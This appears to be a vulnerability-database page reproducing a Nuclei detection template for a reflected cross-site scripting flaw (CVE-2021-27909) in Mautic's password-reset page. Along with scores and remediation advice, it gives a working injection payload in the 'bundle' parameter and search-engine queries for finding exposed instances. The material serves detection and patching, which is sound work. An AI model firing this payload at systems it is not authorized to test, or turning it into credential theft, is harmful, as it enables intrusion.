Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27909
HistoryOct 13, 2022 - 9:55 a.m.

Mautic <3.3.4 - Cross-Site Scripting

2022-10-1309:55:31
ProjectDiscovery
github.com
27
cve2021
mautic
cross-site scripting
acquia

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

EPSS

0.001

Percentile

41.8%

Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.

id: CVE-2021-27909

info:
  name: Mautic <3.3.4 - Cross-Site Scripting
  author: kiransau
  severity: medium
  description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  remediation: |
    Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability.
  reference:
    - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27909
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27909
    cwe-id: CWE-79
    epss-score: 0.00101
    epss-percentile: 0.41606
    cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: acquia
    product: mautic
    shodan-query:
      - title:"Mautic"
      - http.title:"mautic"
    fofa-query: title="mautic"
    google-query: intitle:"mautic"
  tags: cve2021,cve,mautic,xss,acquia

http:
  - method: GET
    path:
      - "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'';alert(document.domain);var ok='"
          - 'mauticBasePath'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022004214644bd57bd24c957e45f5ccfd124047b01bb84fb6b801be733bb59b057af022100f7046d4548d8ec7f1c3d6b89acb2beb064ade7f0cf2f972ee92c906323543d3a:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

EPSS

0.001

Percentile

41.8%